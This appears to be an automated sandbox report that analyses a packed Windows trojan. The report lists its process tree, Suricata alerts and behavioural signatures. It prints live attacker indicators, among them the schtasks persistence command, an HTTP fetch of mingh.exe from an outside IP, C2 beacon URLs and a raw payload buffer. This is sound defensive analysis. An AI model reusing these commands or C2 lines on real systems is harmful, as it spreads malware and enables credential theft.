Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 9, 2024, 7:47 a.m.	Aug. 9, 2024, 7:51 a.m.

Size	319.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`0ec1f7cc17b6402cd2df150e0e5e92ca`
SHA256	`4c5ca5701285337a96298ebf994f8ba013d290c63afa65b5c2b05771fbbb9ed4`
CRC32	`D3DB57C7`
ssdeep	`6144:nx9ooeWfqpO3HS0f+KIXDyqR9NKtU5tyt7EJtdb/yw0cV3IOfe52GGZ2OGe+CKip:nx9onKM2+KIXrLGw0ci22OGe+CKiV9pz`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

kitty.exe "C:\Users\test22\AppData\Local\Temp\kitty.exe"
2556
- schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
  2608
- Cerker.exe "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe"
  2724
  - schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F
    2768

Name	Response	Post-Analysis Lookup
fusionflow-meta.net	A 104.21.74.211 A 172.67.162.233	172.67.162.233

IP Address	Status	Action
104.21.74.211	Active	Moloch
164.124.101.2	Active	Moloch
185.216.214.225	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49165 -> 104.21.74.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49167 -> 104.21.74.211:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49166 -> 185.216.214.225:80	2054413	ET MALWARE ZharkBot User-Agent Observed	A Network Trojan was detected
TCP 192.168.56.101:49166 -> 185.216.214.225:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.216.214.225:80 -> 192.168.56.101:49166	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.216.214.225:80 -> 192.168.56.101:49166	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49165 104.21.74.211:443	C=US, O=Google Trust Services, CN=WE1	CN=fusionflow-meta.net	28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a
TLSv1 192.168.56.101:49167 104.21.74.211:443	C=US, O=Google Trust Services, CN=WE1	CN=fusionflow-meta.net	28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 7:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 9, 2024, 7:48 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 9, 2024, 7:47 a.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Aug. 9, 2024, 7:47 a.m.	buffer: SUCCESS: The scheduled task "Cerker.exe" has successfully been created. console_handle: 0x00000007	1	1	0
WriteConsoleW Aug. 9, 2024, 7:47 a.m.	buffer: SUCCESS: The scheduled task "Cerker.exe" has successfully been created. console_handle: 0x00000007	1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://185.216.214.225/mingh.exe

Performs some HTTP requests (3 events)

request	GET http://185.216.214.225/mingh.exe
request	GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7
request	GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4

A process attempted to delay the analysis task. (1 event)

description

Cerker.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds

Creates executable files on the filesystem (1 event)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Creates a suspicious process (1 event)

cmdline

C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F

Drops a binary and executes it (1 event)

file	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_BaseBoard
wmi	SELECT * FROM Win32_DiskDrive

An executable file was downloaded by the process cerker.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Aug. 9, 2024, 7:48 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd$aYðh @ À`@@ Ô H.textüg h `.rsrcÔ j@@H(?ÔHÝ ªcl>°!//°.f>/´!4¯.j>2!.¯.O>¸:!®«¯¿¶Èj©¦£0¦0¡0äØ)0ÞÇ4h=ÉÉÉÉ¬õÍ¬ÏÇ(úêöÐBÉ³õÉÍ¯ÏTÇpúê÷ÐTÉ§õÊÍýÏYÇ[¾S¾^¾¤C(§¾<º'¸°®+³+¨+\¼Ù2e+Îà/Ü-,%A½Ü2d+Ý¬/Î-e%¥2{+ø/Ó-i%HÛ2o+ø!£>£&£O¥³ÑwPºî£G#§A¥íÃ6Cºá£\`§¥úÎ6Rºý£_b§¥ñÏ#^ºý£df`n9D¿£ ³È¥Ï¥Á¥¥ë¡û£«sÅ$ò"ò.òWëáòYÎpöYôÏü888ô<º>6]¡Æ!y8£õ<Ã>AãEãMãåí¡ÐlÀI]\]D]1[S²nZ~4D]+aY1[S²nP~4D]>aY([ÅS©nX~/D7¹7¹9¹?üü0üÉÏ,ßEåèüYÀNøWú½òÑÏ%ßPååü^À=ø^úüòØÏ(ßJåâü ÀyøIúéòÆÏ&ßYåáüXÀnøBúÈòØqÙqÈqíMÍ~ÍnÍÖþ£Ù¡Ù±ÙÙåÄèè×èÈì³îæ:ÛÝË´ñJè¢Ôì¹îFæhÛÏËâñèñÔÆì²îæ.ÛÜËòñè¢Ôì îFæÛÑË ñè¹Ôì²î4æÇÍÓ1$4ªIï+»>$ô4R\|S\|G\|f@-Ö--å4L-öÛ)õ+D#h 4A-áß)¥+U#=á4-áÐ)ê+Z#=°4C-¤Í)é+Z#Rü¢ù¢ë¢ï»>¢¨¦§§§Ü§\|b£SSSÀSloEWyUÿ].¼-¼4¼!¸º¡²öõí0©Á¹ÙUßUÅU¸S[&fÆv½LUæ§û+¦¥7©ý¹Ð<¦¡©°¹;¦¡'©ô¹ß-¦¥6©þ¹¹ÀÁÞö!!!ú']/rù8[!ûÝ%Û'/ ü8u!ûÏ%æ'\/Û8%¡?¡¡=\¸â¡Cw¥S§ä¯ÖA¸î¡Yi¥§â¯Ël¸ø¡Zu¥Y§Á¯À:d¸1«r««ø«Mz¯Jç¥Õ ²ð«W3¯Vö¥ÉgB²ý«j¯Ný¥ÕgI²þ«@3¯[ç¥È"W²ð«QC¯CPwç;Í<"gûl(k¬ôöëTÒÀìO¡úãeòÇ©Zø>Oú&BìQw¢S#"¡îAÊê+A>ð4Á²µ§ð-Ó¤¬MÚàkCã%ºÝðÏ-S#¹çQë=CßJðokf°À°ºî&>Üe\¼/Ab7E?ç]`ËÊïû×\|tø-6àESË. 4Øò®.¶dh^TSUV8}¤% údçBR982´úPÇ³mHçÇ¢\ì §¹®ÜÚHëc+/ÝZbVB OµÇ³Ùà?£\]3Û;-%¼ûcv-Å £cE1hÐæ)fKc¿ÎÐÊ&Ç(4oORQ¤À$Ár(\1ã½q£§[CÚ:dÔÁÞ6A¥®?+¸È%ËTP±Ý¹á>au'¿è]B?"[ %îÎÁYw¡yy<n2"ã%h¤öß}îU®u·ü¥d`5Fæû¡yØI Züñú./ÒXì,îvÌ>ÈÌÇÄ2]Z÷¢ÚkÛFdU.ÄvURþG\ÜYpöÔD°¶8¾Ó½g&Õ¿q<Qw?gUé&+:½Ëc¢?ÅAß6ÊÑ6Ì^vÐiém·AúÖØ$¤Ø®7yG 01OÉ 9Ì¦7®úÉ¸W:óømË.®[üÇpßgKb}".0¡i©eõ !½õ7Í¶mïJ9å[ºaÞô{ÂWxÂe ¸NÛ n¨I0ËÅ2ågN©¬Ö.+²éÑß´=ØÎdû]Ûª±q1RJ.ùIúÜîøt»rà¯Wç¾wOVë b«é ¥Ô8zãü·<íôïDcJ\ÛÁñøà;òBïåOòäï$×÷[;²«Ï^ö¾( \ ©>HïºÇU /Åc'ùå!vDà¹1ß'äÎ-}á´ìðàtÙGnboÈFÖ p7%Ð( ¤7%Ð( :( Ð&:( Ð&ês s s s! s" Ð&nþo5 þÐ &:(6 Ð&>þÐ&:(6 Ð&:(6 Ð&:Ð &rs"(? t Ð!&:(@ Ð"&(6 fsá}G(6 ÐH&sF}M(6 ~D }LÐ\|&â(6 }S~D }Tj}U#}VÐ&v-+j}U}SÐ&^n}U}SÐ&^j}U}SÐ&^n}U}SÐ&^j}U}SÐ&^n}U}SÐ&¦}U}S~G~ Ð&^}U}SÐ&^l}V}SÐ&^}V }SÐ&^}T }SÐ&>}TÐ©&>}YÐ«&:(6 Ð¬&Js¬ZÐ&Js°\Ð¯&î{^{toª ~t~t~ Y _Ð¾&>}]ÐÍ&vþ}_}`ÐÎ&Rs· aÐÔ&:(6 ÐÚ&~s}j(È (ßÐÜ&>}mÐê&0 )~+[Ewß5£ÊXQß£XÄÐ&+¥ 4Hxaa ~t%Xa8\|ÿÿÿ~t% , 8cÿÿÿ+ö t:t~t 8:ÿÿÿs u uXa8ÿÿÿX_ Àÿ_c`8íþÿÿ _,8Þþÿÿ Y+íb u%Xa`8°þÿÿti 8þÿÿu tX Yau ~ ~ ~WX Ä_XX]aÑo &t ßY8.þÿÿ X 8 þÿÿ 1 8þÿÿ+öuo ~t t:¢8çýÿÿ t:*0æE2qjP ;%Ð request_handle: 0x00cc000c	1	1	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (1 event)

host

185.216.214.225

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Installs itself for autorun at Windows startup (15 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RUNONCE\Cerker.exe	reg_value	C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe
cmdline	C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F

Detects Avast Antivirus through the presence of a library (4 events)

Time & API	Arguments	Return
LdrGetDllHandle Aug. 9, 2024, 7:47 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Aug. 9, 2024, 7:47 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Aug. 9, 2024, 7:47 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781
LdrGetDllHandle Aug. 9, 2024, 7:47 a.m.	module_name: snxhk.dll module_address: 0x00000000 stack_pivoted: 0	3221225781

Harvests credentials from local email clients (1 event)

file	C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst

kitty.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All